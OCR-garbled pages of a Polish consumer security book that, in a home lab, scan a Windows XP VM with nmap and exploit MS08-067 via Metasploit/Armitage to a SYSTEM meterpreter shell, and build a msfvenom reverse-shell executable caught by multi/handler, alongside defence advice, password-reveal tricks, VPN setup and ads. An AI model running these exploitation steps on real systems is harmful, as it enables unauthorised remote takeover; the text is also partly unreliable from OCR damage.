usługi sieciowe, takie jak udostępnianie fol- 


sprawdzenia bezpieczeństwo maszyny _ derów itp., ma włączony firewall systemowy 


z systemem Windows XP, wyszukujemy moż- 


i inne funkcje bezpieczeństwa. Sprawdźmy 


krzysiekEkali:-$ scarchsploit windows xp remote [LN 


| Path 


(Gabriel's FTP Server) Open 6 Compact FTP Server 1.2 - 'PORT' Remote Denial of Service 
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f5 > db_nmap -Pn -n -svV --script vuln 192.168.1.113 

[*] Nmap: Starting Nmap 7.860 ( https://nmap.orq ) at 2020-01-09 17:17 CET 
[*] Nmap: Pre-scan script results: 

[*] Nmap: | broadcast-avahi-dos: 

[*] Nmap: |  Discovered hosts: 

[*] Nmap: | 224.0.0.251 

[*] Nmap: | After NULL UDP ar packet Do: -2011-1002). 

[*] Nmap: | Hosts are all up ( 

[*] Nmap: Nmap scan report for 192.168.1.113 

[*] Nmap: Host is up (6.606039s latency). 

[*] Nmap: ALL 1666 scanned ports on 192.168.1.113 are filtered 

[*] Nmap: MAC Address: 08:00:27:FA:59:AA (Oracle VirtualBox virtual NIC) 
[*] Nmap: Service detection performed. Please report any incorrect results 
tps://nmap.org/submit/ . 

[*] waj | Nmap done: 1 IP address (1 host up) scanned in 59.67 seconds 

> 


zatem, jaki będzie wynik takiego skanowania każda z nich i jak się zabezpieczyć. Na przy- 
w przypadku, gdy wyłączymy systemowy fi- kład w Windows XP, aby pozbyć się słabości 
rewall w systemie Windows XP ©. MS08-067, należy aktywować systemowy fi- 
Po ponownym wykonaniu skanowania bę-  rewall. A w przypadku MS17-010 należy wy- 
dziemy mogli zobaczyć, że zostały wyszuka- łączyć udostępnianie plików w sieci lokalnej. 
ne różnego rodzaju słabości ©, które 
pozwalają przejąć zdalnie kontro. ę jmsfż > db_nmap -Pn -n -sV --script vuln 192.168.1.113 


[*] Nmap: Starting Nmap 7.86 ( https://nmap.org ) at 2026-61-69 17:34 CET 
nad skanowanym komputerem. ||*) Nrap: Pre-scan script results: 
MO 5 [*] Nmap: | broadcast-avahi-dos: 
Tego typu słabości należą do kry- ||[+) map: |  Discovered hosts: 
tycznych zagrożeń, które za wszel- |[t; Naap: | after'Niki UD 


A SE A Nmap: After NULL UDP avahi packet DoS (CVE-2611-1662). 
ką cenę należy wyeliminować. 


[*] Nmap: |_ Hosts are all up (not vulnerable). 
[*] Nmap: Nmap scan report for 192.168.1.113 
[*] Nmap: Host is up (06.606115 latency). 
[*] Nmap: Not shown: 997 closed ports 
[*] Nmap: PORT STATE SERVICE VERSION 
[+] Nmap: 135/tcp open msrpc Microsoft Windows RPC 
[*] Nmap: | _clamav-exec: ERROR: Script execution failed (use -d to debug) 
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 
Zapora systemu windows pomaga chronić ten komputer. uriesnodiwidjąc [*] Nmap: | clamav-exec: ERROR: Script execution failed (use -d to debug) 
spf aoi ele og wr zs Cary z [+] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 
[*] Nmap: | clamav-exec: ERROR: Script execution failed (use -d to debug) 
9 Owtącz (zalochje) [*] Nmap: MAC Address: 08:00:27:FA:59:AA (Oracle VirtualBox virtual NIC) 
AE |" me [*] Nmap: Service Info: 05s: Windows, Windows XP; CPE: cpe:/o:microsoft:window 
pppoe ezedyiaae jar hana iotr zza ydy [*] Nmap: Host script results: 
[*] Nmap: |_samba-vuln- -cve- ZZ0R2E 1182: NT_STATUS_ACCES5_ DENIED 
[*] 8-0 
1*] : VULNERABLE : 
[*] 1 Microsoft Windows system vulnerable to remote code execution (M$ 
State: VULNERABLE 


Zapora systemu Windows 


Nic zezwałaj na wyjątki 


Zaznacz to połe wyboru. jedli łączysz się z siecią publiczną w 
mein bezguwcznych muejscach, takich jak panty lotnicza 
Użytkowe: ró zoddarie powańdcenicey. góy ZaęceA systoru 
'Wndowi zabłok uje program. Wybory na karcie Wywęłki będą 
igretowane. 


| 8 © Wyłącz (nie zalecane) 


CVE:CVE-2008-4250 

The Server service in Microsoft Windows 2806 SP4, XP SP. 
Vista Gold and S5P1, Server 2668, and 7 Pre-Beta allows 
code via a crafted RPC request that triggers the overflf4 


| 

Unką użynaria lego udamiera Wyłączenie Zapay zystena 

Wnekwe: może spowodować, zn komęużes będze hsrdzej maiażory 

na wiusy i rinizów 

Disclosure date: 2008-10-23 

References: 
https://technet.microsoft.com/en-us/library/security/ms68 -6f 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE -2008-425 


Coeizcze musze wędręć © Zacocze systemu Windowi? 


| anka | smb-vuln-ms10-054: false 
smb-vuln-ms16-861: ERROR: Script execution failed (use -d to debu! 
. 32.5 5 . : | smb-vuln-ms17-6160: 
Każda słabość jest odpowiednio ; | VULNERABLE: 
ż A : : Remote Code Execution vulnerability in Microsoft SMBvl servers 
opisana i sklasyfikowana. Podana i State: VULNERABLE 


jest data wykrycia, nazwa, pod jaką ROR ak zr 


jest zapisana, Oraz źródła, gdzie : NA chy say gy execution vulnerability exists in Mif 
znajdziemy więcej informacji. Je- Ś 
Śli skanując własną sieć domową, [-; ymap: 


Disclosure date: 2017-03-14 


I 
| References: 
kryj i Ścią-. |I*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi7name=CVE-2617-014. 
wy jemy urządzenia ze słabościa: [*] Nmap: | https://technet „microsoft .com/en-us/library/security/ms17-8 
mi, musimy koniecznie sprawdzić [*] Nmap: |_ https://blogs. technet „microsoft .com/msrc/2617/05/12/custome 


Ą [+] Nmap: Service detection performed. Please report any incorrect results at 
Ww wyszukiwarce, na czym polega [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 48.55 seconds 


psfż > 
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Dla początkujących: 


a! czywiście, wyłączając firewall, sami 
u / stworzyliśmy zagrożenie. Jeśli ponownie 
klikniemy w programie Armitage na górnym 
pasku na Attacks, Find Attacks, przy naszej 
maszynie wirtualnej pojawią się dostępne 
ataki © - wystarczy kliknąć na jeden z nich 
prawym przyciskiem myszy. 


- 


192.168.1.113 


check explolts 


W przypadku Armitage nie jesteśmy w stanie 
od razu stwierdzić, na jaką słabość podatny 
jest testowany system. Musimy ręcznie spraw- 
dzać ataki jeden po drugim. My wykorzystamy 
słabość MS08-067, bo wiemy, że nasza testowa 
maszyna jest na nią podatna. Wystarczy klik- 


nąć na atak, a następnie na Launch ©. 
W oknie u dołu pojawi się przebieg wyko- 
nywania exploitu ©. Jeśli pojawi się wpis: 


Attack192.168.1113 
MS08.067 Microsoft Server Serce Relative Path Stack Corruption 


This module explo 
through the Server Service. 


a parsiną flaw in the path canoniealz: 


Value 
192.168.1.108 
4510 
192.168.1.113 
445 

BROWSER 


RHOSTS + 
RPORT 
SMBPIPE 


Targets: |0 => Automatic Targeting 


lv] Use a reverse connection 


CJ Show advanced options 


Launch 


sf5 exploit (windows /smb /ms08_ 
Exploit running as background job 1 
Exploit completed, but no session was created. 
Started reverse TCP handler on 192.168.1. 108 
192.168.1.113:445 - Automatically detecting the 
192.168.1.113:445 - Finqerprint: Windows XP - 
192. 160. : Selected Tarqet 
192. 168, 
Sending 


c 
5 . 


(180291 bytes) to 192.168.1.113 


stage 
Meterpreler session 1 opened (192.168.1.108:23923 -> 192.168.1.113: 


msf5 exploit(windows /smb/ms08_067 netapi) > 


tlon code of NetaPI32.dll 
This module is capable of bypassing NX on some operating * 


Armitage 


Meterpreter session 1 opened, zostało 
nawiązane połączenie z daną maszyną i uzy- 
skaliśmy dostęp zdalny. 

Dodatkowo w głównym oknie widoku ho- 
stów symbol maszyny zostaje zmieniony na 
taki, który oznacza pokonanie zabezpieczeń 


Q TFSTXP 


19. 
ZARZ_DZANIE W 


Post Modules 


maszyny © - mamy nad nią pełną kontrolę. 
Wystarczy kliknąć prawym przyciskiem 
myszy na przejętą maszynę, wybrać 
z menu opcję Meterpreter 1 6, a potem 
jedną z kategorii. Na tym etapie można zro- 
bić praktycznie wszystko: wykonać zrzut 
hashy z hasłami danego systemu, przeglą- 
dać pliki na dysku, wykonywać zrzuty 
ekranu, nagrywać dźwięk z mikrofonu 
lub obraz z kamery internetowej, a nawet 
zainstalować backdoor, dzięki któremu bez 
kolejnego ataku będziemy mogli połączyć 
się z daną maszyną. 


067 _netapi) > exploit -j 


23923 

target... 
Service Pack 
Windows XP SP3 Polish (NX) 
5 - Attempting to trigger the vulnerability... 


) - lanq:PoLish 
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Dla zaawansowanych: msfconsole 


msf5 > search ms08-067 |A| 


Matching Modules 


4 Name 


msfs > | 


Disclosure Date Rank 


8 exploit/windows/smb/ms68 067 netapi 2008-10-28 


Check Description 


great Yes 


MSQ8-067 Microsoft 


J ak już wiemy, msfconsole i metasploit 
są trudniejsze w obsłudze, jednak niezastą- 
pione, gdyż pozwalają na uzyskanie bardziej 
precyzyjnych informacji na temat słabości 
testowanego systemu. Cały proces próby 
przejęcia kontroli można wykonać z poziomu 
msfconsole i w większości przypadków jest to 


Po zakończeniu można wybrać metodę ataku 
- wybieramy z kategorii exploit. 


W celu załadowania exploitu do urucho- 
mienia wpisujemy polecenie: 
use exploit/windows/smd/ms08_067 
_netapi ©. 


jedyna zalecana metoda, gdyż Armi- 
tage nie zawsze jest kompatybilny 


sf5 > use exploit/windows/smb/ms08_067 netapi 
sf5 exploit(windows/smb/ms68_067_netapi) > |] 


z różnymi exploitami Głabościami). 


Po przeskanowaniu w poprzednich wska- 
zówkach wiemy, że nasza maszyna jest 
z pewnością podatna na słabość MS08-067. 


Wewnątrz msfconsole wpisujemy pole- 
cenie: 
search ms08-067 []. 


Wpisujemy polecenie options 6, dzięki 
niemu poznamy szczegóły danego mo- 
dułu i opcje do ustawienia. 


W tym przypadku wystarczy skonfiguro- 
wać jedynie opcję RHOSTS - czyli adres 
IP naszego celu. Wpisujemy polecenie: 
set rhosts [adres IP] ©- 


sf5 exploit(windows/smb/ms68_067_netapi) > set rhosts 192.168.1.113 
rhosts => 192.168.1.113 
sf5 exploit(windows/smb/ms68_067_netapi) > |] 


[nsf5 exploit(windows/smb/ms68_067_netapi) > options 


Module options (exploit/windows/smb/ms08_067 netapi): 


Name Current Setting Required Description 

RHOSTS yes The target host(s), range CIDR identifier 
RPORT 445 yes The SMB service port (TCP) 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


Exploit target: 


Id Name 


© 


Automatic Targeting 


msf5 exploit(windows/smb/ms©8 067 netavi) > I 
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sf5 exploit(windows/smb/ms68_067_netapi) > check 1 Teraz pozostaje jedynie 


[+] 192.168.1.113:445 - The target is vulnerable. 
sf5 exploit(windows/smb/ms08_067_netapi) > |] 


uruchomienie testu - 
wykonujemy komendę run. 


Na tym etapie możemy już sprawdzić, czy 

cel jest podatny na ten konkretny moduł 
wybrany przez nas z listy w kroku 3. Wpisu- 
jemy polecenie check E]. 


Jest to jedynie przybliżona analiza i może 

być ona fałszywie pozytywna - to czy 
cel jest na pewno podatny, można sprawdzić 
jedynie, przeprowadzając faktycznie atak. 


Jeśli w tym momencie go uruchomimy, 
nic jednak nie uzyskamy, gdyż nie został 
skonfigurowany nasłuch, czyli nie uzyskamy 
informacji zwrotnych z testowanej maszyny. 
Dodajemy go, wpisując polecenie: 
set payload windows/x64/meterpreter/ 
reverse_tcp ©. 


Test przebiegł poprawnie, gdyż uzyskaliśmy 
dostęp do sesji meterpreter [H. 


1 Po wykonaniu komendy getuid do- 

wiemy się, jakie mamy uprawnienia 
- ZARZĄDZANIE NT, to najwyższe możliwe 
uprawnienia. Możemy uzyskać dostęp bezpo- 
średni do Wiersza polecenia z uprawnieniami 
administratora, wykonując polecenie shell. 


meterpreter > getuid 

server username: ZARZĄDZANIE NTYSYSTEM 
meterpreter > shell 

Process 120 created. 

(Channel 2 created. 

Microsoft Windows XP [Wersja 5.1.2660] 
(C) Copyright 1985-2681 Microsoft Corp. 


[C: ŃWINDOWSYsystem32>|] 


f5 exploit(windows/smb/ms68_067_netapi) > set payload windows/meterpreter/reverse_tcp 


s 
payload => windows/meterpreter/reverse tcp 
sf5 exploit(windows/smb/ms68_067 netapi) > |] 


sf5 exploit(windows/smb/ms68_067_netapi) > set lhost 192.168.1.108 


lhost => 192.168.1.108 


sf5 exploit(windows/smb/ms68_067_netapi) > |] 


Musimy też dodać msf5 exploit(windows/smb/ms68_667_netapi) > options [7] 


informację, na jaki ad- Module options (exploit/windows/smb/ms68_067_netapi): 


res IP ma być kierowana 


zwrotna komunikacja E Name Current Setting Required Description 

podajemy adres maszyny RHOSTS _ 192.168.1.113 _ yes The target host(s), 
z systemem Kali Linux: RPORT 445 yes The SMB service por 
set Ihost [adres IP] c] SMBPIPE BROWSER yes The pipe name to us 


1 0 Po ponownym wy- Payload options (windows/meterpreter/reverse tcp): 


konaniu polece- 


ą e 3 Name Current Setting Required Description 

nia options [-] będziemy SEZON oo z Óh RE RENEE > Zest 
mogli zobaczyć wWprowa- EXITFUNC thread yes Exit technique (AC 
LHOST 192.168.1.108 ycs The listen address 


dzone przez nas zmiany. TRĘEZ FEG 


yes The listen port 


mst5 exploit(windows/smb/ms68_067_netapi) > run 


[*] sending stage (180291 bytes) to 192.168.1.113 


meterpreter > JJ B 


[*] Started reverse TCP handler on 192.168.1.108:4444 

[*] 192.168.1.113:445 - Automatically detecting the target... 

[*] 192.168.1.113:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Polish 
[+1 192.168.1.113:445 - Selected Target: Windows XP SP3 Polish (NX) 

[*] 192.168.1.113:445 - Attempting to trigger the vulnerability... 


[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.113:1031) at 2020-61-16 11:33:55 +0100 
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Jak obronić się przed 
tego typu atakami 

Dzięki powyższym przykładom 
mogliśmy poznać w przybliżeniu 
krok po kroku analizy bezpieczeństwa kon- 
kretnego urządzenia w sieci. Wiemy już też, 
jak bardzo niebezpieczne są słabości, któ- 
re umożliwiają zdalny dostęp do maszyny 
- ofiara ataku nie jest nawet świadoma, że 
została zaatakowana. Dlatego też po wykona- 
niu audytu, gdy okaże się, że nasza maszyna 
jest podatna na konkretne ataki, należy jak 


najszybciej zapoznać się z każdym z nich 
i uniemożliwić go. W większości przypad- 
ków sprowadza się to do aktywowania fire- 
walla, wyłączenia udostępniania plików oraz 
innych usług, które mogą mieć otwarte porty 
i nasłuchiwać w sieci. Wszystkie te słabości 
wyjdą na jaw w trakcie testów i będziemy 
mogli się obronić. Oczywiście jest tu mowa 
o atakach zdalnych wykonywanych z we- 
wnątrz sieci. Program antywirusowy nieko- 
niecznie może obronić nas przed tego typu 
atakiem. 


Ataki wykonywane po stronie klienta 


lub przez internet 


D ruga grupa ataków, nieco mniej niebez- 
piecznych, to ataki, które polegają na pró- 
bie oszukania ofiary, aby kliknęła na jakiś nie- 
bezpieczny link lub pobrała niebezpieczny plik 
i uruchomiła go na swoim komputerze. Bardzo 
często na tego typu ataki podatni są starsi użyt- 
kownicy, którzy nie są świadomi zagrożenia. 
Takie ataki mogą również być wykonywane 


program, którego zadaniem jest wykonanie 
połączenia zwrotnego. 


W Terminalu wykonujemy komendę: 

msfvenom -p windows/x64/meter- 
preter/reverse_tcp -f exe LHOST=[adres 
IP Kali Linux] LPORT=4444 > szkodliwy_ 


z poziomu MSf- [krzysiekekali:-$ msfvenom 
console, dzięki 
temu możemy 
na wirtualnej 
maszynie spraw- 
dzić, jak zacho- 


rom the payload 


Payload size: 510 bytes 


plik.exe 4 


-p windows/X64/meterpreter/reverse tcp -f exe 


LH0ST=192.168.1.108 LPORT=4444 > szkodliwy plik.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows f 


[-] No arch selected, selecting arch: x64 from the payload 
No encoder or badchars specified, outputting raw payload 


Final size of exe file: 7168 bytes 


wuje się system 
w przypadku takiego ataku. W tych testach 
sprawdzimy bezpieczeństwo systemu Win- 
dows 10. 

Utworzymy najprostszy złośliwy program, 
który pozwoli na uzyskanie kontroli zdalnej 
oraz utworzenie połączenia zwrotnego Z Sys- 
temem Kali Linux. 


Tworzenie złośliwego pliku 

i sprawdzenie ochrony 

W tym celu wykorzystamy narzędzie msfve- 
nom, które wchodzi w skład pakietu meta- 
sploit. Utworzymy najprostszy możliwy 


Teraz musimy przygotować naszą maszy- 

nę na odebranie połączenia zwrotnego 
z urządzenia, które testujemy. Uruchamiamy 
w Terminalu narzędzie msfconsole i wpisu- 
jemy polecenie use multi/handler 4 


msf5 > use multi/handler 
msf5 exploit(multi/handtler) > |] 


Wskazujemy, z jakiego modułu do obsłu- 
gi połączeń przychodzących będziemy 
korzystać. Wykonujemy polecenie: 
set payload windows/x64/meterpreter/ 
reverse_tcp 


msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 
payload => windows/x64/meterpreter/reverse tcp 
msf5 exploit(multi/handter) > |] 
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Musimy wykonać 

konfigurację, po- 
dając nasz adres IP: 
set Ihost [adres IP] 
AJ 

Następnie urucha-: | 

miamy nasłuch, 
wykonując polecenie 


Name Current Setting Required Description 
Teraz uruchamia- EXITFUNC process yes Exit technique (Accepted: 
my naszą maszy- LHOST 192.168.1.108 yes The listen address (an ir 
nę wirtualną z sys- LPORT 4444 yes The listen port 


sf5 exploit(multi/handler) > zal 192.168.1.108 
host => 192.168.1.108 

msf5 exploit(multi/handler) > options 

Module opLions (exploiL/mulLi/handler): 

Name Current Setting Required Description 


Payload options (windows/x64/meterpreter/reverse tcp): 


temem Windows 10 


sf5 exploit(multi/handler) > run [3] 


[*] Started reverse TCP handler on 192.168. 


temie Kali Linux w konsoli 
msfconsole pojawi się otwar- 


1.108:4444 | ta sesja [3]. Uzyskaliśmy więc 


i dzięki zainstalowanym dodatkom gościa 
przeciągamy nasz niebezpieczny plik na 
pulpit © (jest to symulacja pobrania z inter- 
netu niebezpiecznego pliku przy wyłączonej 
ochronie systemu Windows 10). 


slownik1999.txt.qz 


+ 
*% 


szkodliwy_plik.exe 


Następnie uruchamiamy plik w systemie 
Windows. Będziemy mogli przez kilka se- 
kund zaobserwować „kółko” na ekranie sys- 
temowym, ale nic nie zostanie uruchomione. 
W tle jednak został wykonany złośliwy kod, 
który stworzył furtkę dla atakującego i w sys- 


kontrolę nad systemem. 


8: jednak powtórzymy próbę takiego 
testowego ataku z włączoną domyślną 
ochroną systemu Windows, pojawi się infor- 
macja jak na kolejnej stronie. (Zaawansowani 
atakujący mogą korzystać ze specjalnych pro- 
gramów, które umożliwiają ominięcie ochro- 
ny w Windows, a nawet specjalistycznych 
programów antywirusowych). 


Jak obronić się przed tego 

typu atakami 

Najskuteczniejszą obroną w przy- 

padku ataków wykonywanych po 
stronie klienta, czyli przez uruchamianie pli- 
ków wykonywalnych, jest zwracanie szcze- 
gólnej uwagi, od kogo otrzymujemy plik, czy 
jest to pewne źródło. Czy mamy aktywną 
ochronę systemową? Czy korzystamy z do- 
datkowych programów do ochrony systemu, 
na przykład Malwarebytes Anti-Malware 


sf5 exploit(multi/handler) > run 


[*] Started reverse TCP handler on 192.168.1.108:4444 
[*] Sending stage (206403 bytes) to 192.168.1.112 
[*] Meterpreter session 2 ŁK © RORY ŻA 


> getuid 
Server username: DFSKTOP-6BS7COGNTEST 
terpreter > |] 


> 192.168.1.112:49719) at 2020-01-10 13:05:03 +0100 
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jak obronić się przed przejęciem kontroli nad komputerem 


lownik1999.txt.gz 


*4 1— przerwana akcja = x 


+, 
OS 


Nieoczekiwany błąd uniemozliwia skopiowanie pliku. Jeśli ten komunikat o 
błędzie będzie nadal wyświetlany, możesz użyć kodu błędu, aby poszukać 


pzkodliwy plik.exe pomocy w rozwiązaniu problemu. 


Błąd 0x200700E1: Operacja nie zakończyła się pomyślnie, ponieważ plik 


zawiera wirusa lub potencjalnie niechciane oprogramowanie. 


kojca 3 Tęgg 7 szkodliwy_plik 
e Data utworzenia: 10.01.2020 13:00 
), wolna przestrzeń: 46... 4d Rozmiar: 7,00 KB 


Spróbuj ponownie | 


Więcej szczegółów 


Windows Defender automatycznie blokuje zagrożenia i wirusy - niestety, nie jest tak skuteczny 
jak programy antywirusowe i nie zawsze może nas ochronić i wykryć zagrożenia 


(MIEH), oraz programu an- 
tywirusowego? Działające 
w tle programy do ochrony 
powinny w czasie rzeczy- 
wistym wykryć tego typu | gre wes waw | ce © 

zagrożenia przy próbie po- | == © wetem pe (© ustom 
brania złośliwego plikuna | © a Zyzu ssj PETR 
nasz dysk. Dodatkowo rów- | .. pri z. 
nież przy uruchomieniu plik 
jest sprawdzany, jeśli mamy 
program antywirusowy. Bat- z AA Ja 
dzo dobrym pomysłem jest |  ... „al a = 
także korzystanie ze stro- | * 
ny virustotal.com, któ- 
ra umożliwia przeskanowanie pliku lub 
adresu URL w aż 68 silnikach programów 
antywirusowych. 


Klikamy na File, Choose file © - wska- 
zujemy potencjalnie niebezpieczny plik 
z naszego dysku i klikamy na Otwórz. 


Otwieramy w przeglądarce stronę o ad- 
resie www.virustotal.com. 


Po chwili plik zostanie przeskanowany. 
Utworzony na próbę w ramach testów 


plik został wielokrotnie zmieniony 
Lo w celu ukrycia jego prawdziwego 
działania. Jak widać, tylko część pro- 
gramów antywirusowych była w sta- 
nie wykryć takie zagrożenie ©- 

Dlatego tak ważne jest skanowanie 
w poszukiwaniu zagrożeń, jeśli chce- 


FILE 


| Choose file 
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Warto wiedzieć 
VPN — TUNELOWANE BEZPIECZNE POŁĄCZENIE Z INTERNETEM 


W kilku poprzednich rozdziałach były wspominane programy VPN. Pozwalają one na znaczne 
podniesienie poziomu bezpieczeństwa podczas korzystania z internetu. W sieci domowej nie 


ma to aż tak dużego znaczenia, gdyż nie będziemy mieć w niej intruzów, jeśli odpowiednio ją 
zabezpieczymy. Warto jednak korzystać z VPN zawsze, gdy używamy hotspotów i otwartych 
sieci Wi-Fi dostępnych w restauracjach, hotelach czy też na lotniskach. W takich miejscach 
nigdy nie wiemy, czy ktoś nie chce podsłuchać naszej komunikacji i przechwycić danych. 


0 Windscribe 


o pobrania z KŚ+ (www. 

ksplus.pl) jest program 
Windscribe, który umożliwia 
korzystanie z usług VPN - za- 
pewnia bezpieczne szyfrowa- 
ne połączenie z internetem. 
Bezpłatna wersja programu 
VPN pozwala na wykorzystanie 
10 GB miesięcznie (po potwier- 
dzeniu adresu e-mail). 


windscribe 


Zapora (i 


Nawiązujemy bezpieczne połączenie 
Instalujemy program, uruchamiamy go, 
zakładamy konto i klikamy na link po- 

twierdzający w wiadomości e-mail. 


Teraz mo- 
żemy zalo- 
gować się do 
programu - po 
podaniu da- 
nych klikamy 


na Login ę 


Wystarczy 
kliknąć 
na symbol za- 
silania [J, by aktywować połączenie VPN 
z wybranym serwerem. Po nawiązaniu bez- 
piecznego połączenia wygląd okna aplikacji 
zostanie zmieniony na niebieski EH. 


Zaloguj się do Windscribe 


Zostało500GB Q windscribe 


| Twój iP 


178.217.197.125 


Zwiększamy bezpieczeństwo 
Domyślnie Windscribe korzysta z protokołu 
IKEv2, który opiera się na IPSec. Możemy 
jednak korzystać z protokołu OpenVPN, któ- 
ry zapewnia większe bezpieczeństwo. 


W głównym oknie Windscribe 
klikamy na symbol trzech 
kresek, a potem na Ustawienia 


Przechodzimy do zakładki Połączenie 

i w polu Tryb połączenia wybieramy opcję 
Ręczna [H. Zmieniamy protokół na UDP [£] na 
porcie 443 [H - jest to protokół OpenVPN. 
Zatwierdzamy zmiany, klikając na OK. 


o |ole 


Połączenie Proxy Udostępnij Debuguj 


Ogólne 
Tryb zapory: Automatyczna tć 


Tryb połączenia 


. Ręczna [EJ 


= Port 443 


Automatyczna 


[prtotót wre -B 
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Odczytujemy zagwiazdkowane hasła 


est to bardzo prosty i przydatny trik. Pozwa- 

la szybko odszyfrować zagwiazdkowane 
hasła zapisane w pamięci przeglądarki. Często 
zdarza się, że zapominamy dane logowania, któ- 
re uzupełnia za nas przeglądarka, i mamy pro- 
blem, gdy potrzebujemy podać je na innym niż 
zwykle urządzeniu lub w innej przeglądarce. 
Zobaczmy, jak odkryć tekst ukryty za „gwiazd- 
kami” na przykładzie Chrome. 


Na urządzeniu, na którym zwykle się lo- 
gujemy do danej usługi, uruchamiamy 
przeglądarkę, wchodzimy na stronę, do któ- 


FH Save current session 


testatestowy.com 
£badaj |A| 
- M 


h 3 


dujemy w nim wpis type="password" [3] 
i zmieniamy go na type="text" [H. Zmiany 
zatwierdzamy klawiszem ie]. 


E mail 


Hasło ..220000000) 


*| Zapamiętaj mnie 


Od razu po zatwierdzeniu zobaczymy, że 
w formularzu „gwiazdki” zostają zastą- 
pione tekstem i można odczytać hasło. 


rej mamy zapisane dane logowania 
- powinny automatycznie załadować 
się w formularzu logowania 


a 
PI 


Klikamy prawym przyciskiem 
myszy na pole z „gwiazdkami” 
i wybieramy opcję Zbadaj []. 


pl.front" metnod="post" « 


class _lpchecked-"1 


neader">_</div 


+ormlontainer 


»<li closs>-0/1i 


tabel c1ass="J]Sfkoata"" for="f_password">Hasło:/1ahe1 
inputf type- "password") id-"f_password" name- "password 
autocomplete="off" style='background-image: uri("data: 
image/png; 

base64 , 1VBORWOKGOAMAANSUNEUgALAAFAGALBCAQAMNAC IHAWCAAAACOI 


Zostanie otwarte okno z narzę- 
dziami dewelopera, wybrane 
przez nas pole tekstowe będzie 


1aD ad c Inputuata TUT= 
id="f_password 
autocomplete="off 
image/png; 


T_PGSSWUTU 7TMaS1U:</ IaDĘ 
name="password 


style="background-image: url("data: 


automatycznie zaznaczone. Odnaj- 


Szybkie sprawdzanie haseł do sieci Wi-Fi 
zapisanych w systemie Windows 


JJ eśli chcemy sprawdzić hasła do sieci, 
z którymi łączyliśmy się w przeszłości, 
żeby zalogować się na nowym urządzeniu, 
możemy skorzystać z dostępnego w KS+ pro- 
gramu WirelesskKeyView. 


Wystarczy go uruchomić, a po chwili 
w głównym oknie pojawi się lista wszystkich 
sieci bezprzewodowych, z jakimi łączyliśmy 
się w przeszłości wraz z hasłami dostępu. Ha- 
sła znajdują się w kolumnie Klucz (Ascii) 


4 VGrelessKeyView 
Plik Edycja Widok Opcje Pomoc 
ZxWARÓJA 

"Nazwa sieci (55 a 


Typ klucza Klucz... Klucz (Ascii) 


WPA2-PSK 


Nazwa adaptera 


Intel(R) Dual Band Wireless-AC 82 


WPA2-PSK Intel(R) Dual Band Wireless-AC 82  (C0E57449-4956-4508-81E8-188CB.. WPAZPSK AES 

i WPA2-PSK Intel(R) Duał Band Wireless-AC 82 (C0€87449-4956-4508-81E8-188CB... WPAZPSK AES 

*P BOGDANKA WPAŻ-PSK Ą Intel(R) Dual Band Wireless-AX 82 (C0€87449-4956-4508-81E8-188C8.. WPAZPSK AES 
4% DIRECT-GDLAPTO... WPA2-PSK rs. d ; Wd... Microsoft Wi-Fi Direct Virtusi Ada.. (003E72A9-B2A7-428D-925-BIEB.. WPAŻPSK AES 
*9FTIMS WPA2-PSK ZE A Intel(R) Duał Band Wireless-AC 82 _ (C0€87449-4956-4508-81E8-188CB.. WPAŻPSK AES 
46 Juhas Nowy 2 WPA2-PSK. Intel(R) Duał Band Wireless-AC 82 _ (C0E57449-4936-4508-81E8-188CB... WPAŻZPSK AES 


Guid adaptera Autentykacja 


(C0E87449-4956-4508-81E8-188CB... WPAZPSK 
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W KŚ+ znajdziemy e-wydanie tej Biblio- Po zalogowaniu się FINRRPRRE 
teczki i obraz ISO dołączonej do niej płyty możemy zarejestrować E"" 
do samodzielnego wypalenia na DVD lub kod nadrukowany na płycie 

utworzenia bootowalnego pendrive'a z Kali _ dołączonej do książki. Wystarczy kliknąć na 
w wersji Live. Z KŚ$+ można pobrać również link © i przepisać kod. 

superpakiet narzędzi do ochrony Windows 


przed hakerami. Uzyskamy w ten sposób dostęp do 


Zarejestruj kod 


; e-wydania © i do bonusowego obrazu 
Otwieramy stronę www.ksplus.pl. LOgu- płyty €. Do serwisu 


jemy się © (używamy konta zserwisu kŚ+ możemy logo- || 4200 Z00U1= 
Komputerswiat.pl). Jeżeli nie mamy konta, | wać się z dowol- 


klikamy na ©, by się zarejestrować. nego urządzenia LIILGUSZUUJNA 


Załóż konto z dostępem do in- 
ternetu. BONUSY 


Zarejestruj kod 


UWAGA! W KŚ+ ZA DARMO E-WYDANIE KSIĄŻKI ORAZ PLIK ISO PŁYTY 


POLECAMY INNE NASZE KSIĄŻKI 


OBRÓBKA WIDEO 100 TRIKÓW DO ZDJĘĆ 


Porady do najlepszych darmowych edy- Najlepsze triki do najlepszych darmowych 
torów wideo: jak ratować nieostre ujęcia, programów graficznych: poprawianie 

efektownie kolorować filmy z ludźmi, i retusz, efekty i filtry, fotomontaże, własne 

tworzyć efekty specjalne. Na DVD: edytory, projekty. Na DVD narzędzia pokazane we 
pliki szkoleniowe, sample wideo wskazówkach, a w KŚ+ - bank zdjęć. 


Nasze książki kupisz na 
Książki są również dostępne w wersji elektronicznej na 


BEZPIECZEŃSTWO 
DLA KAZDEGO 


Większość osób korzystających na co dzień 

z komputera nie zdaje sobie sprawy, jak bardzo 
jesteśmy narażeni na ataki cybernetyczne. 
Zagrożona jest nasza sieć bezprzewodowa, konta 
w serwisach internetowych, system operacyjny, 
przeglądarka, dane. 


Krzysztof Dziedzie 

specjalista Zainstalowanie programu antywirusowego nie 

od sieci jest kompletnym rozwiązaniem. Warto wiedzieć, 

i zabezpieczeń w jaki sposób myślą cyberprzestępcy i jak można 
powstrzymać ich ataki - pozwoli nam to zapewnić 
sobie bezpieczeństwo w sieci. Taką wiedzę 
uzyskamy z porad zawartych w tej książce. 


Porady zostały podzielone na charakterystyczne 
rozdziały, dzięki czemu będziemy mogli krok po 
kroku analizować bezpieczeństwo naszej sieci 
oraz urządzeń do niej podłączonych i blokować 
możliwości ataku na naszą przestrzeń. Opisywane 
w książce działania to zagadnienie, którym 
zajmują się tak zwani etyczni hakerzy. Są to osoby, 
